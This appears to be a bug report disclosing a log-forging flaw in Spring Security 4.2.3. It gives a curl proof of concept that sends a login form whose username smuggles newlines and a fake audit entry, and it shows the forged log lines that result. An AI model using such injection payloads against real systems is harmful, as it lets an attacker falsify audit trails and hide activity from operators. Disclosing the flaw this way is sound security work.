Spring Security Possible log forging

Summary

It's possible for user to forge a log and insert random string in there. Like extra lines which looks like logs.

Actual Behavior

• Run curl similar to below curl:

curl -k http://localhost:8080/login -H 'Content-Type':'application/x-www-form-urlencoded' -d 'username=not_valid_user, 
***********************************************
INJECT WHATEVER YOU WANT
[2017-05-31 10:25:18.435] - [http-bio-30031-exec-6] .... TRACE --- Audit:
PrincipalAuthenticationFailure ('null'): principal=not_valid_user, 
***********************************************
&password=pwd'

Things you see in logs:

[2017-07-20 23:14:32.116] uaa - 1179 [http-nio-8080-exec-5] .... DEBUG --- LdapAuthenticationProvider: Processing authentication request for user: not_valid_user,
************************************************************
INJECT WHATEVER YOU WANT
[2017-05-31 10:25:18.435] - [http-bio-30031-exec-6] .... TRACE --- Audit:
PrincipalAuthenticationFailure ('null'): principal=not_valid_user, 
************************************************************
[2017-07-20 23:14:32.117] uaa - 1179 [http-nio-8080-exec-5] .... DEBUG --- FilterBasedLdapUserSearch: Searching for user 'not_valid_user
************************************************************
INJECT WHATEVER YOU WANT
[2017-05-31 10:25:18.435] - [http-bio-30031-exec-6] .... TRACE --- Audit:
PrincipalAuthenticationFailure ('null'): principal=not_valid_user, 
************************************************************

Expected Behavior

It's not possible to add extra lines in logs

Version

4.2.3

Notes

We changed the logging level for LdapAuthenticationProvider and FilterBasedLdapUserSearch to INFO to avoid printing username.

Thanks!